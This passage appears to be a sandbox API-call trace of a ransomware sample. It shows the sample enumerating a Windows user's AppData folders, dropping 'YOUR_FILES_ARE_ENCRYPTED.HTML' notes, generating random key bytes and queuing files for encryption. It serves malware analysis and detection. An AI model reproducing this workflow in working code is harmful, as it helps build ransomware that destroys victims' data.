dwReserved1=0x3187cb8, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0118.300] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.300] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 228 [0118.300] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0118.300] lstrlenW (lpString=".LOG1") returned 5 [0118.300] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0118.300] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x89ca2f32, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89ca2f32, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89ca2f32, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d68c8, dwReserved1=0x3187cb8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0118.300] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.300] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 228 [0118.300] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0118.300] lstrlenW (lpString=".LOG2") returned 5 [0118.300] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0118.300] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x89ca2f32, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89ca2f32, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89ca2f32, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d68c8, dwReserved1=0x3187cb8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0118.300] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.300] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 233 [0118.301] GetProcessHeap () returned 0x600000 [0118.301] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\microsoft.windows.assignedaccesslockapp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.302] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.303] CloseHandle (hObject=0x320) returned 1 [0118.304] GetProcessHeap () returned 0x600000 [0118.304] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.304] GetProcessHeap () returned 0x600000 [0118.304] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.304] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89c56a54, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89ca2f32, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89ca2f32, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0118.304] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.304] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 217 [0118.304] GetProcessHeap () returned 0x600000 [0118.304] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\microsoft.windows.assignedaccesslockapp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.401] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.402] CloseHandle (hObject=0x324) returned 1 [0118.402] GetProcessHeap () returned 0x600000 [0118.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.402] GetProcessHeap () returned 0x600000 [0118.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.404] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0118.404] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.404] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState") returned 115 [0118.404] GetProcessHeap () returned 0x600000 [0118.404] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.405] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState" [0118.405] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState\\*" [0118.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0118.406] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.406] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 0 [0118.406] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0118.406] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0118.406] GetProcessHeap () returned 0x600000 [0118.406] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.408] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.409] CloseHandle (hObject=0x324) returned 1 [0118.409] GetProcessHeap () returned 0x600000 [0118.409] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.409] GetProcessHeap () returned 0x600000 [0118.409] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.410] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0118.410] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.410] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings") returned 111 [0118.410] GetProcessHeap () returned 0x600000 [0118.410] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.412] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings" [0118.412] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\*" [0118.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x92954bae, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0118.429] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x92954bae, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.429] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0118.429] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.429] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\roaming.lock") returned 124 [0118.429] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.429] lstrlenW (lpString=".lock") returned 5 [0118.429] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.429] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x92c4fc93, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92c4fc93, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0118.429] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.429] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat") returned 124 [0118.429] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.429] lstrlenW (lpString=".dat") returned 4 [0118.429] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.429] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0118.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0118.431] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0118.431] GetProcessHeap () returned 0x600000 [0118.431] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0118.434] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A1") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="D8") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E3") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="CC") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="C0") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="26") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="3B") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C7") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="8D") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="31") returned 2 [0118.434] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="E4") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="87") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="35") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="AD") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="6A") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="FB") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="62") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="37") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="CE") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="91") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="12") returned 2 [0118.435] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="49") returned 2 [0118.435] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="09") returned 2 [0118.435] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="96") returned 2 [0118.435] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A0") returned 2 [0118.435] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="57") returned 2 [0118.435] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="9B") returned 2 [0118.435] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="AB") returned 2 [0118.435] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="62") returned 2 [0118.435] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="41") returned 2 [0118.435] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="65") returned 2 [0118.435] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="64") returned 2 [0118.436] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat" [0118.436] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.436] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0118.436] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x92849c84, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92849c84, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92849c84, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0118.436] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.436] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 129 [0118.436] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0118.436] lstrlenW (lpString=".LOG1") returned 5 [0118.436] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0118.436] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x92849c84, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92849c84, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92849c84, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0118.437] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.437] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 129 [0118.437] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0118.437] lstrlenW (lpString=".LOG2") returned 5 [0118.437] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0118.437] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x92849c84, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92849c84, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92849c84, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0118.437] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0118.437] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0118.437] GetProcessHeap () returned 0x600000 [0118.437] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 